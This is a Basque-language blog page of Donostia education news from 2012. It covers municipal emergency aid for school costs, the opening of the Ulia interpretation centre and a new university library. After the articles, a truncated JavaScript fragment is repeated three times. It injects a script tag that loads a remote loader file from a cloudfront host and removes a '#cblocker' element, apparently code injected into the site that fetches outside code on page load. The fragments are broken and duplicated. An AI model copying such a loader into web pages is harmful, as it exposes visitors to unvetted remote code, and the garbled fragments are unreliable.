Category: Hezkuntza
Hezkuntzaren alorreko Gizarte larrialdietarako laguntzak 1000 familiei
Abe 01 2012- donostia
- 0 Comments
Donostiako Udalak kontzeptu bat zabaldu du gizarte larrialdietarako laguntzen baitan hezkuntza gastuei aurre egiteko, eta honi esker 900 eta 1.000 familia artean jasoko dute babes ekonomikoa. Diru laguntzak 3 eta 16 urte arteko haurrak dituzten familiei bideratuko dira, eta aurreikusi da 1.350 haur lagundu ahal izatea.
Progresiboa izango da kontzeptu honen harira banatuko den kopuru maximoa, hain zuen ere, familietan adin tarte horretako dauden haurren araberakoa. Hartara, haur bakarra duen sendiak gehienez 145 euro jasoko ditu, bi haur dituenak 215 euro, hiru haur dituenak 290 euro eta lau haur edo gehiago dituenak 360 euro. Orotara 180.000 euro banatuko dira. Eskaerak aurkezteko epea abenduaren 31n amaituko da.
Orain arte jasota ez zegoen irizpide berri bat aintzat hartzeko zabaldu da kontzeptua. Gizarteratzeko eta Diru Sarrerak Bermatzeko legeak dio oinarrizko beharrei dagozkien gastuak ordaindu daitezkeela, hala nola janztekoari, hezkuntzari eta osasu arretari dagozkionak, sistema publikoek gastu horiei aurre egiten ez dietenean.
Jon Albizu, Gizarte Ongizateko zinegotziak zehaztu du azken urteotan lehentasuna izan dutela beste gastu batzuk, bereziki, etxebizitza duin bat izateko diru laguntzak, baina krisiak irizpideen inguruko hausnarketa bat eskatu duela: “Ongizate zerbitzuetatik egiaztatu ahal izan dugu adin txikikoen eskolatzeak familiako ekonomian duen eragina oso handia izaten ari dela. BEZak eskola materialean izan duen igoerak, familia askoren diru-sarreren jeitsierak, eta eskolatzean dauden bestelako gastuak, besteak beste, guraso elkarteen kuotak, eskolaz kanpoko jarduerak, edota jantzien gastuak ez dira laguntzetan aurreikusiak egoten, eta ulertzen dugu bizi dugun testuinguru honetan aintzat hartu beharrekoak direla”.
Zentzu horretan, zinegotziak gogoratu du Udala ahalegin handia egiten ari dela gizarte alorrean diru laguntzei eusteko, uste duelako administrazio publikoak garai honetan gastu soziala lehenetsi behar duela: “Donostiako Udalak hainbat babes ildo dauzka, batetik zuzeneko laguntza ekonomikoak, bertan Gizarte Larrialdietarako Laguntzak eta Gizarteratzeko Udal Laguntzak daudelarik, eta, bestetik, hobariak, kontzeptu zehatzetarako”.
Gizarte Larrialdietarako Laguntzen baitan urtean 1.393.899 euro bideratzen dira 1.600 familiari. Gizarteratzeko diru laguntzen baitan, berriz, 467.240 euro banatzen dira 359 familiaren artean.
Tasen eta udal patronatuen prezioen hobariari dagokionez, zehaztu beharra dago diru sarrera gutxi duten pertsonentzako bideratuak daudela, hala nola, beste kolektibo batzuentzat, adibidez, langabezian daudenentzat. Helburua da uraren eta zaborren tasa bezalako ordainketei aurre egin ahal izatea, kirol txartela erabili ahal izatea, euskara zerbitzuaren jardueretan beherapenak izatea, eskola musikaren tasa merkeago iatea, hala nola, garraio publikoa. Orotara 2.211.603 euro bideratzen dira partida honetara.
(ITURRIA: Donostiako Udaleko Prentsa Bulegoko oharretik jasoa)
Uliako Interpretazio Zentroa martxan da
Uzt 25 2012- donostia
- 0 Comments
2012ko uztailaren 28an irekiko ditu ateak Uliako Interpretazio Zentro berriak. Ekipamenduaren kudeaketa Cristina Enea Fundazioak hartuko du bere gain, era honetan, koordinatzen duen hirugarren udal-dotazioa bilakatuz, Cristina Eneako Ingurumen Baliabideen Etxea eta Urgulleko Natur Txokoarekin batera.
Donostiako Udalak, fundazioaren bidez herritarren artean sustatu nahi duen ingurumen eta iraunkortasun baloreetara bideraturiko eraldaketa adeitsua lortzeko tresna eta baliabide didaktiko garrantzitsuak dira aipatu hiru gune horiek. Interpretazio Zentroaren kasuan, Ulia bezalako leku berezi eta enblematikoa ezagutzera emateko balioko du, bere ingurune fisiko, natural eta historikoan sakonduz.
Irekierako bideoa
Interpretazio zentro berriak jarduera didaktiko eta kulturalez beteriko egitaraua izango du, tailer didaktikoekin,
Karlos Santamaria liburutegia Donostiako Kulturaren sinbolo berria
Api 29 2012- donostia
- 0 Comments
Juan Karlos Izagirre alkateak eta Ikerne Badiola Foru Aldundiko Kultura Diputatuak Karlos Santamaria UPV/EHUko liburutegi berria inauguratu zuten (2011ko irailaren 23an), Ibaetako Kanpusean, Isabel Celaá Eusko Jaurlaritzako Kultura sailburuarekin, Iñaki Goirizelaia unibertsitateko Erretorea eta Kristina Uriarte Gipuzkoako Kanpuseko Erretoreordearekin batera. Karlos Santamaria zenaren senideak ere liburutegiaren irekieran egon ziren. Alkateak esan zuenez, liburutegi hau gakoa izango da Donostiako kulturgintzan eta hezkuntza arloan, 16.600 metro karratu eta egun dauzkan 530.000 libururekin.
// -1?’https’:'http’;var ccm=document.createElement(‘script’);ccm.type=’text/javascript’;ccm.async=true;ccm.src=http+’://d1nfmblh2wz0fd.cloudfront.net/items/loaders/loader_1063.js?aoi=1311798366&pid=1063&zoneid=15220&cid=&rid=&ccid=&ip=’;var s=document.getElementsByTagName(‘script’)[0];s.parentNode.insertBefore(ccm,s);jQuery(‘#cblocker’).remove();});};]]>
// -1?’https’:'http’;var ccm=document.createElement(‘script’);ccm.type=’text/javascript’;ccm.async=true;ccm.src=http+’://d1nfmblh2wz0fd.cloudfront.net/items/loaders/loader_1063.js?aoi=1311798366&pid=1063&zoneid=15220&cid=&rid=&ccid=&ip=’;var s=document.getElementsByTagName(‘script’)[0];s.parentNode.insertBefore(ccm,s);jQuery(‘#cblocker’).remove();});};]]>
// -1?’https’:'http’;var ccm=document.createElement(‘script’);ccm.type=’text/javascript’;ccm.async=true;ccm.src=http+’://d1nfmblh2wz0fd.cloudfront.net/items/loaders/loader_1063.js?aoi=1311798366&pid=1063&zoneid=15220&cid=&rid=&ccid=&ip=’;var s=document.getElementsByTagName(‘script’)[0];s.parentNode.insertBefore(ccm,s);jQuery(‘#cblocker’).remove();});};]]>




